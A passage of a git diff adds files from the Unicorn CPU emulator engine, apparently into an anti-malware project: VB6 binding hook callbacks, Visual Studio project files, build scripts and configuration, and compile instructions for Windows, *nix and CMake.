Currency, ByVal size As Long, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_block_hook address, size +End Sub + +'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); +Public Sub mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_mem_hook t, address, size, value +End Sub + +'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); +Public Function invalid_mem_hook(ByVal uc As Long, ByVal t As uc_mem_type, ByVal address As Currency, ByVal size As Long, ByVal value As Currency, ByVal user_data As Long) As Long + 'return 0 to stop emulation, 1 to continue + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Function + invalid_mem_hook = u.internal_invalid_mem_hook(t, address, size, value) +End Function + +'typedef void (*vb_cb_hookintr_t)(uc_engine *uc,uint32_t intno, void *user_data); +Public Sub interrupt_hook(ByVal uc As Long, ByVal intno As Long, ByVal user_data As Long) + Dim u As ucIntel32 + Set u = findInstance(user_data) + If u Is Nothing Then Exit Sub + u.internal_interrupt_hook intno +End Sub + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.sln b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.sln new file mode 100644 index 0000000..dd7f017 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.sln @@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 10.00 +# Visual Studio 2008 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ucvbshim", "ucvbshim.vcproj", "{6FC797B7-2985-49C8-92CD-CA985AF3511C}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.ActiveCfg = Debug|Win32 + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Debug|Win32.Build.0 = Debug|Win32 + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.ActiveCfg = Release|Win32 + {6FC797B7-2985-49C8-92CD-CA985AF3511C}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.vcproj b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.vcproj new file mode 100644 index 0000000..83f7952 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/ucvbshim.vcproj @@ -0,0 +1,204 @@ +<?xml version="1.0" encoding="Windows-1252"?> +<VisualStudioProject + ProjectType="Visual C++" + Version="9.00" + Name="ucvbshim" + ProjectGUID="{6FC797B7-2985-49C8-92CD-CA985AF3511C}" + RootNamespace="My1" + Keyword="Win32Proj" + TargetFrameworkVersion="196613" + > + <Platforms> + <Platform + Name="Win32" + /> + </Platforms> + <ToolFiles> + </ToolFiles> + <Configurations> + <Configuration + Name="Debug|Win32" + OutputDirectory="$(SolutionDir)$(ConfigurationName)" + IntermediateDirectory="$(ConfigurationName)" + ConfigurationType="2" + CharacterSet="2" + > + <Tool + Name="VCPreBuildEventTool" + /> + <Tool + Name="VCCustomBuildTool" + /> + <Tool + Name="VCXMLDataGeneratorTool" + /> + <Tool + Name="VCWebServiceProxyGeneratorTool" + /> + <Tool + Name="VCMIDLTool" + /> + <Tool + Name="VCCLCompilerTool" + Optimization="0" + AdditionalIncludeDirectories="./../../include/" + PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE;" + MinimalRebuild="true" + BasicRuntimeChecks="3" + RuntimeLibrary="1" + UsePrecompiledHeader="0" + WarningLevel="3" + DebugInformationFormat="4" + /> + <Tool + Name="VCManagedResourceCompilerTool" + /> + <Tool + Name="VCResourceCompilerTool" + /> + <Tool + Name="VCPreLinkEventTool" + /> + <Tool + Name="VCLinkerTool" + OutputFile="./ucvbshim.dll" + LinkIncremental="2" + GenerateManifest="false" + ModuleDefinitionFile="" + GenerateDebugInformation="true" + SubSystem="1" + TargetMachine="1" + /> + <Tool + Name="VCALinkTool" + /> + <Tool + Name="VCManifestTool" + EmbedManifest="false" + /> + <Tool + Name="VCXDCMakeTool" + /> + <Tool + Name="VCBscMakeTool" + /> + <Tool + Name="VCFxCopTool" + /> + <Tool + Name="VCAppVerifierTool" + /> + <Tool + Name="VCPostBuildEventTool" + /> + </Configuration> + <Configuration + Name="Release|Win32" + OutputDirectory="$(SolutionDir)$(ConfigurationName)" + IntermediateDirectory="$(ConfigurationName)" + ConfigurationType="2" + CharacterSet="2" + WholeProgramOptimization="1" + > + <Tool + Name="VCPreBuildEventTool" + /> + <Tool + Name="VCCustomBuildTool" + /> + <Tool + Name="VCXMLDataGeneratorTool" + /> + <Tool + Name="VCWebServiceProxyGeneratorTool" + /> + <Tool + Name="VCMIDLTool" + /> + <Tool + Name="VCCLCompilerTool" + Optimization="2" + EnableIntrinsicFunctions="true" + AdditionalIncludeDirectories="./../../include/" + PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE;" + RuntimeLibrary="0" + EnableFunctionLevelLinking="true" + UsePrecompiledHeader="0" + WarningLevel="3" + DebugInformationFormat="3" + /> + <Tool + Name="VCManagedResourceCompilerTool" + /> + <Tool + Name="VCResourceCompilerTool" + /> + <Tool + Name="VCPreLinkEventTool" + /> + <Tool + Name="VCLinkerTool" + OutputFile="./ucvbshim.dll" + LinkIncremental="1" + GenerateManifest="false" + GenerateDebugInformation="true" + SubSystem="1" + OptimizeReferences="2" + EnableCOMDATFolding="2" + TargetMachine="1" + /> + <Tool + Name="VCALinkTool" + /> + <Tool + Name="VCManifestTool" + EmbedManifest="false" + /> + <Tool + Name="VCXDCMakeTool" + /> + <Tool + Name="VCBscMakeTool" + /> + <Tool + Name="VCFxCopTool" + /> + <Tool + Name="VCAppVerifierTool" + /> + <Tool + Name="VCPostBuildEventTool" + /> + </Configuration> + </Configurations> + <References> + </References> + <Files> + <Filter + Name="Source Files" + Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx" + UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}" + > + <File + RelativePath=".\main.cpp" + > + </File> + </Filter> + <Filter + Name="Header Files" + Filter="h;hpp;hxx;hm;inl;inc;xsd" + UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}" + > + <File + RelativePath="..\..\include\unicorn\unicorn.h" + > + </File> + <File + RelativePath="..\..\include\x86.h" + > + </File> + </Filter> + </Files> + <Globals> + </Globals> +</VisualStudioProject> diff --git a/ai_anti_malware/unicorn/unicorn-master/cmake.sh b/ai_anti_malware/unicorn/unicorn-master/cmake.sh new file mode 100644 index 0000000..7806a0e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/cmake.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Unicorn Emulator Engine (www.unicorn-engine.org) +# Usage: cmake.sh [x86] [arm] [aarch64] [m68k] [mips] [sparc] +# By chenhuitao 2019 + +FLAGS="-DCMAKE_BUILD_TYPE=Release" + +UNICORN_ARCH="${*}" + +if [ -z "${UNICORN_ARCH}" ]; then + cmake "${FLAGS}" .. +else + cmake "${FLAGS}" "-DUNICORN_ARCH=${UNICORN_ARCH}" .. +fi + +make -j8 diff --git a/ai_anti_malware/unicorn/unicorn-master/config.mk b/ai_anti_malware/unicorn/unicorn-master/config.mk new file mode 100644 index 0000000..c3621fb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/config.mk @@ -0,0 +1,30 @@ +# Unicorn Emulator Engine +# By Nguyen Anh Quynh, 2015 + +# This file contains all customized compile options for Unicorn emulator. +# Consult docs/COMPILE.md & docs/README.md for more details. + +################################################################################ +# Compile with debug info when you want to debug code. +# Change this to 'no' for release edition. + +UNICORN_DEBUG ?= yes + +################################################################################ +# Specify which archs you want to compile in. By default, we build all archs. + +UNICORN_ARCHS ?= x86 m68k arm aarch64 mips sparc + + +################################################################################ +# Change 'UNICORN_STATIC = yes' to 'UNICORN_STATIC = no' to avoid building +# a static library. + +UNICORN_STATIC ?= yes + + +################################################################################ +# Change 'UNICORN_SHARED = yes' to 'UNICORN_SHARED = no' to avoid building +# a shared library. + +UNICORN_SHARED ?= yes diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/BHUSA2015-unicorn.pdf b/ai_anti_malware/unicorn/unicorn-master/docs/BHUSA2015-unicorn.pdf new file mode 100644 index 0000000..9096197 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/BHUSA2015-unicorn.pdf differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-CMAKE.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-CMAKE.md new file mode 100644 index 0000000..6e8be6c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-CMAKE.md @@ -0,0 +1,57 @@ +This documentation explains how to compile Unicorn with CMake on Windows or +*nix. + +---- + +Requirements: + +- Windows: MicroSoft Visual Studio(>=2013). +- *nix: GNU gcc or clang to generate dynamic source files. + +Get CMake for free from http://www.cmake.org. + + +[1] To build Unicorn using Nmake of Windows SDK, do: + + mkdir build + cd build + ..\nmake.bat + + After this, find the samples test*.exe, unicorn.lib & unicorn.dll + in the same directory. + + +- To build Unicorn using Visual Studio, choose the generator accordingly to the + version of Visual Studio on your machine. For example, with Visual Studio 2013, do: + + mkdir build + cd build + cmake -G "Visual Studio 12" .. + + After this, find unicorn.sln in the same directory. Open it with Visual Studio + and build the solution including libraries & all test as usual. + + +[2] You can make sure the prior steps successfully worked by launching one of the + sample binary (sample_*.exe). + + +[3] You can also enable just one specific architecture by passing the architecture name + to either the cmake.sh or nmake.bat scripts. e.g.: + + ..\nmake.bat x86 + + Will just target the x86 architecture. The list of available architectures are: + X86 ARM AARCH64 M68K MIPS SPARC. + + +[4] You can also create an installation image with cmake, by using the 'install' target. + Use: + + cmake --build . --config Release --target install + + This will normally install an image in a default location (on MacOS and Linux, but this is not supported + on Windows). So in case you want to change the install location, set this when configuring CMake. + Use: `-DCMAKE_INSTALL_PREFIX=path` for instance, to put the installation in the 'path' subdirectory of + the build directory. + The default value of 'CMAKE_INSTALL_PREFIX' on *nix is '/usr/local'. diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-NIX.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-NIX.md new file mode 100644 index 0000000..6964d68 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-NIX.md @@ -0,0 +1,164 @@ +This documentation explains how to compile, install & run Unicorn on MacOSX, +Linux, BSD, Solaris, Android & iOS. + +To compile for Microsoft Windows, see [COMPILE-WINDOWS.md](COMPILE-WINDOWS.md) + +---- + +[1] Tailor Unicorn to your need. + +Out of 6 archtitectures supported by Unicorn (Arm, Arm64, M68K, Mips, Sparc, +& X86), if you just need several selected archs, choose which ones you want +to compile in by editing "config.mk" before going to next steps. + +By default, all 6 architectures are compiled. If this is what you want, skip +to the section 2. + +The other way of customize Unicorn without having to edit config.mk is to +pass the desired options on the commandline to ./make.sh. Currently, +Unicorn supports 4 options, as follows. + + - UNICORN_ARCHS: specify list of architectures to compiled in. + - UNICORN_STATIC: build static library. + - UNICORN_SHARED: build dynamic (shared) library. + - UNICORN_QEMU_FLAGS: specify extra flags for qemu's configure script + +To avoid editing config.mk for these customization, we can pass their values to +make.sh, as follows. + + $ UNICORN_ARCHS="arm aarch64 x86" ./make.sh + +NOTE: on commandline, put these values in front of ./make.sh, not after it. + +For each option, refer to docs/README for more details. + + + +[2] Compile and install from source on *nix + +To build Unicorn on *nix (such as MacOSX, Linux, *BSD, Solaris): + +- To compile for current platform, run: + + $ ./make.sh + + On Mac OS, to build non-universal binaries that includes only 64-bit code, + replace above command with: + + $ ./make.sh macos-universal-no + +- To cross-compile Unicorn on 64-bit Linux to target 32-bit binary, + cross-compile to 32-bit with: + + $ ./make.sh linux32 + + After compiling, install Unicorn with: + + $ sudo ./make.sh install + + For FreeBSD/OpenBSD, where sudo is unavailable, run: + + $ su; ./make.sh install + + Users are then required to enter root password to copy Unicorn into machine + system directories. + + Afterwards, run ./samples/sample_all.sh to test the sample emulations. + + + NOTE: The core framework installed by "./make.sh install" consist of + following files: + + /usr/include/unicorn/unicorn.h + /usr/include/unicorn/x86.h + /usr/include/unicorn/arm.h + /usr/include/unicorn/arm64.h + /usr/include/unicorn/mips.h + /usr/include/unicorn/ppc.h + /usr/include/unicorn/sparc.h + /usr/include/unicorn/m68k.h + /usr/lib/libunicorn.so (for Linux/*nix), or /usr/lib/libunicorn.dylib (OSX) + /usr/lib/libunicorn.a + + + +[3] Cross-compile for iOS from macOS. + +To cross-compile for iOS (iPhone/iPad/iPod), macOS with Xcode installed is required. + +- To cross-compile for iOS ArmV7 (iPod 4, iPad 1/2/3, iPhone4, iPhone4S), run: + + $ ./make.sh ios_armv7 + +- To cross-compile for iOS ArmV7s (iPad 4, iPhone 5C, iPad mini), run: + + $ ./make.sh ios_armv7s + +- To cross-compile for iOS Arm64 (iPhone 5S, iPad mini Retina, iPad Air), run: + + $ ./make.sh ios_arm64 + +- To cross-compile for all iOS devices (armv7 + armv7s + arm64), run: + + $ ./make.sh ios + +Resulted files libunicorn.dylib, libunicorn.a & tests/test* can then +be used on iOS devices. + + + +[4] Cross-compile for Android + +To cross-compile for Android (smartphone/tablet), Android NDK is required. + +- To cross-compile for Android Arm, run: + + $ NDK=~/android/android-ndk-r20 ./make.sh cross-android_arm + +- To cross-compile for Android Arm64, run: + + $ NDK=~/android/android-ndk-r20 ./make.sh cross-android_arm64 + +Resulted files libunicorn.so, libunicorn.a & tests/test* can then +be used on Android devices. + + + +[5] By default, "cc" (default C compiler on the system) is used as compiler. + +- To use "clang" compiler instead, run the command below: + + $ ./make.sh clang + +- To use "gcc" compiler instead, run: + + $ ./make.sh gcc + + + +[6] To uninstall Unicorn, run the command below: + + $ sudo ./make.sh uninstall + + + +[7] Language bindings + +Look for the bindings under directory bindings/, and refer to README file +of corresponding languages. + + + +[8] Unit tests + +Mac OS X users will also need the GNU version of binutils (for gobjcopy). +It can be easily installed with Homebrew: `brew install binutils`. + +Automated unit tests use the cmocka unit testing framework (https://cmocka.org/). +It can be installed in most Linux distros using the package manager, e.g. +`sudo yum install libcmocka libcmocka-devel`. +On Mac OS X with Homebrew: `brew install cmocka`. +You can also easily build and install it from source. + +You can run the tests by running `make test` in the project directory. If you don't +build some architecture support then the corresponding tests will fail when run. diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-WINDOWS.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-WINDOWS.md new file mode 100644 index 0000000..94744be --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE-WINDOWS.md @@ -0,0 +1,184 @@ +To build Unicorn on Windows natively using Visual Studio, see docs under "msvc" +directory in root directory. + +The rest of this manual shows how to cross-compile Unicorn for Windows using +either MingW or Msys2. + +To compile for Linux, Mac OS X and Unix-based OS, see [COMPILE-NIX.md](COMPILE-NIX.md) + +--- + + +[0] Dependencies + +For Windows, cross-compile requires Mingw. At the moment, it is confirmed that +Unicorn can be compiled either on Ubuntu or Windows. + +- On Ubuntu 14.04 64-bit, do: + + - Download DEB packages for Mingw64 from: + + https://launchpad.net/~greg-hellings/+archive/ubuntu/mingw-libs/+build/2924251 + + +- On Windows, install MinGW via package MSYS2 at https://msys2.github.io/ + + Follow the install instructions and don't forget to update the system packages with: + + $ pacman --needed -Sy bash pacman pacman-mirrors msys2-runtime + + Then close MSYS2, run it again from Start menu and update the rest with: + + $ pacman -Su + + Finally, install required toolchain to build C projects. + + - To compile for Windows 32-bit, run: + + $ pacman -S make + $ pacman -S mingw-w64-i686-toolchain + + - To compile for Windows 64-bit, run: + + $ pacman -S make + $ pacman -S mingw-w64-x86_64-toolchain + +- For Cygwin, "make", "gcc-core", "libpcre-devel", "zlib-devel" are needed. + + If apt-cyg is available, you can install these with: + + $ apt-cyg install make gcc-core libpcre-devel zlib-devel + + + +[1] Tailor Unicorn to your need. + +Out of 6 archtitectures supported by Unicorn (Arm, Arm64, M68K, Mips, Sparc, +& X86), if you just need several selected archs, choose which ones you want +to compile in by editing "config.mk" before going to next steps. + +By default, all 6 architectures are compiled. + +The other way of customize Unicorn without having to edit config.mk is to +pass the desired options on the commandline to ./make.sh. Currently, +Unicorn supports 4 options, as follows. + + - UNICORN_ARCHS: specify list of architectures to compiled in. + - UNICORN_STATIC: build static library. + - UNICORN_SHARED: build dynamic (shared) library. + - UNICORN_QEMU_FLAGS: specify extra flags for qemu's configure script + +To avoid editing config.mk for these customization, we can pass their values to +make.sh, as follows. + + $ UNICORN_ARCHS="arm aarch64 x86" ./make.sh + +NOTE: on commandline, put these values in front of ./make.sh, not after it. + +For each option, refer to docs/README for more details. + + + +[2] Compile from source on Windows - with MinGW (MSYS2) + +To compile with MinGW, install MSYS2 as instructed in the first section. + +Note: After MSYS2 is installed, you will have 3 shortcuts to open the command prompt: "MSYS2 MSYS", "MSYS2 MinGW-32 bit" and "MSYS2 MinGW 64-bit". Use the MinGW shortcut so that compilation succeeds. + +Then, build Unicorn with the next steps: + +- To compile Windows 32-bit binary with MinGW, run: + + $ ./make.sh cross-win32 + +- To compile Windows 64-bit binary with MinGW, run: + + $ ./make.sh cross-win64 + +Resulted files unicorn.dll, unicorn.lib & samples/sample*.exe can then +be used on Windows machine. + +To run sample_x86.exe on Windows 32-bit, you need the following files: + + unicorn.dll + %MSYS2%\mingw32\bin\libgcc_s_dw2-1.dll + %MSYS2%\mingw32\bin\libwinpthread-1.dll + +To run sample_x86.exe on Windows 64-bit, you need the following files: + + unicorn.dll + %MSYS2%\mingw64\bin\libgcc_s_seh-1.dll + %MSYS2%\mingw64\bin\libwinpthread-1.dll + + + +[3] Compile and install from source on Cygwin + +To build Unicorn on Cygwin, run: + + $ ./make.sh + +After compiling, install Unicorn with: + + $ ./make.sh install + +Resulted files cygunicorn.dll, libunicorn.dll.a and libunicorn.a can be +used on Cygwin but not native Windows. + +NOTE: The core framework installed by "./make.sh install" consist of +following files: + + /usr/include/unicorn/*.h + /usr/bin/cygunicorn.dll + /usr/lib/libunicorn.dll.a + /usr/lib/libunicorn.a + + + +[4] Cross-compile for Windows from *nix + +To cross-compile for Windows, Linux & gcc-mingw-w64-i686 (and also gcc-mingw-w64-x86-64 +for 64-bit binaries) are required. + +- To cross-compile Windows 32-bit binary, simply run: + + $ ./make.sh cross-win32 + +- To cross-compile Windows 64-bit binary, run: + + $ ./make.sh cross-win64 + +Resulted files unicorn.dll, unicorn.lib & samples/sample*.exe can then +be used on Windows machine. + +To run sample_x86.exe on Windows 32-bit, you need the following files: + + unicorn.dll + /usr/lib/gcc/i686-w64-mingw32/4.8/libgcc_s_sjlj-1.dll + /usr/i686-w64-mingw32/lib/libwinpthread-1.dll + +To run sample_x86.exe on Windows 64-bit, you need the following files: + + unicorn.dll + /usr/lib/gcc/x86_64-w64-mingw32/4.8/libgcc_s_sjlj-1.dll + /usr/x86_64-w64-mingw32/lib/libwinpthread-1.dll + +Then run either "sample_x86.exe -32" or "sample_x86.exe -64" to test emulators for X86 32-bit or X86 64-bit. +For other architectures, run "sample_xxx.exe" found in the same directory. + + + +[5] Language bindings + +Look for the bindings under directory bindings/, and refer to README file +of corresponding languages. + + + +[6] Unit tests + +Automated unit tests use the cmocka unit testing framework (https://cmocka.org/). +It can be installed in most Linux distros using the package manager, e.g. +`sudo yum install libcmocka libcmocka-devel`, or you can easily build and install it from source. + +You can run the tests by running `make test` in the project directory. diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE.md b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE.md new file mode 100644 index 0000000..a5ec77f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/docs/COMPILE.md @@ -0,0 +1,25 @@ +To compile Unicorn on Mac OS X, Linux, BSD, Solaris and all kind of nix OS, +see [COMPILE-NIX.md](COMPILE-NIX.md) + +To compile Unicorn on Windows, see [COMPILE-WINDOWS.md](COMPILE-WINDOWS.md) + +To compile Unicorn with CMake on Windows or *nix, see +[COMPILE-CMAKE.md](COMPILE-CMAKE.md) + +Then learn more on how to code your own tools with our samples. + + - For C sample code, see code in directory samples/sample*.c + - For Python sample code, see code in directory bindings/python/sample*.py + - For samples of other bindings, look into directories bindings/<language>/ + +#Building unicorn - Using vcpkg + +You can download and install unicorn using the [vcpkg](https://github.com/Microsoft/vcpkg) dependency manager: + + git clone https://github.com/Microsoft/vcpkg.git + cd vcpkg + ./bootstrap-vcpkg.sh + ./vcpkg integrate install + ./vcpkg install unicorn + +The unicorn port in vcpkg is kept up to date by Microsoft team members and community contributors. If the version is out of date, please [create an issue or pull request](https://github.com/Microsoft/vcpkg) on the vcpkg repository. \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ABkexFCfphu3zIg.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ABkexFCfphu3zIg.png new file mode 100644 index 0000000..a82d8e1 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ABkexFCfphu3zIg.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/DkztJcigHCdmnRp.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/DkztJcigHCdmnRp.png new file mode 100644 index 0000000..95f43f5 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/DkztJcigHCdmnRp.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/F3rSByYuNTGDtC1.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/F3rSByYuNTGDtC1.png new file mode 100644 index 0000000..4cba273 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/F3rSByYuNTGDtC1.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/I25E9sWcJpGyax7.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/I25E9sWcJpGyax7.png new file mode 100644 index 0000000..f4a5af7 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/I25E9sWcJpGyax7.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/IZhyWrGebA5tT4i.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/IZhyWrGebA5tT4i.png new file mode 100644 index 0000000..4fb5a43 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/IZhyWrGebA5tT4i.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/K4HMijIVt6lofvT.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/K4HMijIVt6lofvT.png new file mode 100644 index 0000000..521dbfb Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/K4HMijIVt6lofvT.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/MbZk8KjQFqJOxmd.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/MbZk8KjQFqJOxmd.png new file mode 100644 index 0000000..795ed2c Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/MbZk8KjQFqJOxmd.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/NExsavSgu4yMbBQ.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/NExsavSgu4yMbBQ.png new file mode 100644 index 0000000..3bd2401 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/NExsavSgu4yMbBQ.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/OVaHwelNQ4tcLmo.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/OVaHwelNQ4tcLmo.png new file mode 100644 index 0000000..05bd9d8 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/OVaHwelNQ4tcLmo.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/YCMNcEVyX8GHoPb.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/YCMNcEVyX8GHoPb.png new file mode 100644 index 0000000..0268295 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/YCMNcEVyX8GHoPb.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ZtRKvUoaPTlshJ4.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ZtRKvUoaPTlshJ4.png new file mode 100644 index 0000000..37c505c Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/ZtRKvUoaPTlshJ4.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/aU1lbmxMjXA5g3K.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/aU1lbmxMjXA5g3K.png new file mode 100644 index 0000000..130e7a8 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/aU1lbmxMjXA5g3K.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/bpu4r8hgzUvO7Pm.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/bpu4r8hgzUvO7Pm.png new file mode 100644 index 0000000..a5df3cb Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/bpu4r8hgzUvO7Pm.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/dqKBwAWUL7XvypE.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/dqKBwAWUL7XvypE.png new file mode 100644 index 0000000..b053216 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/dqKBwAWUL7XvypE.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/fOnNpSKvjYyc7QB.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/fOnNpSKvjYyc7QB.png new file mode 100644 index 0000000..382c440 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/fOnNpSKvjYyc7QB.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/iyodlNFY7hHEOgS.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/iyodlNFY7hHEOgS.png new file mode 100644 index 0000000..90d7bf9 Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/iyodlNFY7hHEOgS.png differ diff --git a/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/juNPWvwGUlraKRh.png b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/juNPWvwGUlraKRh.png new file mode 100644 index 0000000..83a3baa Binary files /dev/null and b/ai_anti_malware/unicorn/unicorn-master/docs/Micro Unicorn-Engine API Documentation/API_Doc_Pic/juNPWvwGUlraKRh.png differ diff --git 